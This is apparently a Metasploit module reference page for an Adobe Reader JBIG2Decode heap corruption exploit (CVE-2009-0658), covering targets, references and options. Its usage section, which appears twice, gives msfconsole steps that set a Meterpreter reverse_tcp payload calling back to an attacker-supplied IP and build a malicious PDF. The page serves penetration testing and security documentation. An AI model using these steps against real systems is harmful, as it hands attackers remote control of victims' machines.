Browse Exploit & Auxiliary Modules
The Metasploit Project hosts the world's largest database of quality assured exploits, including hundreds of remote exploits, auxiliary modules, and payloads. You can even review the Metasploit Framework source code of any module - or write your own.
Search for modules
Adobe JBIG2Decode Memory Corruption Exploit
This module exploits a heap-based pointer corruption flaw in Adobe Reader 9.0.0 and earlier. This module relies upon javascript for the heap spray.
Rank
- Good
Authors
- natron < natron [at] metasploit.com >
- xort < >
- redsand < >
- MC < mc [at] metasploit.com >
- Didier Stevens < didier.stevens [at] gmail.com >
References
- CVE-2009-0658
- OSVDB-52073
- http://bl4cksecurity.blogspot.com/2009/03/adobe-acrobatreader-universal-explo...
Exploit Targets
- 0 - Adobe Reader v9.0.0 (Windows XP SP3 English) (default)
- 1 - Adobe Reader v8.1.2 (Windows XP SP2 English)
Development
Similar Modules
- exploit/windows/fileformat/a-pdf_wav_to_mp3
- exploit/windows/fileformat/acdsee_fotoslate_string
- exploit/windows/fileformat/acdsee_xpm
- exploit/windows/fileformat/activepdf_webgrabber
- exploit/windows/fileformat/adobe_collectemailinfo
- exploit/windows/fileformat/adobe_cooltype_sing
- exploit/windows/fileformat/adobe_flashplayer_button
- exploit/windows/fileformat/adobe_flashplayer_newfunction
- exploit/windows/fileformat/adobe_flatedecode_predictor02
- exploit/windows/fileformat/adobe_geticon
Usage Information
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/windows/fileformat/adobe_jbig2decode
msf exploit(adobe_jbig2decode) > show payloads
msf exploit(adobe_jbig2decode) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(adobe_jbig2decode) > set LHOST [MY IP ADDRESS]
msf exploit(adobe_jbig2decode) > exploit
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/windows/fileformat/adobe_jbig2decode
msf exploit(adobe_jbig2decode) > show payloads
msf exploit(adobe_jbig2decode) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(adobe_jbig2decode) > set LHOST [MY IP ADDRESS]
msf exploit(adobe_jbig2decode) > exploit
Module Options
| FILENAME | The file name. (default: msf.pdf) |
| ContextInformationFile | The information file that contains context information |
| DisablePayloadHandler | Disable the handler code for the selected payload |
| EnableContextEncoding | Use transient context when encoding payloads |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |
| WfsDelay | Additional delay when waiting for a session |
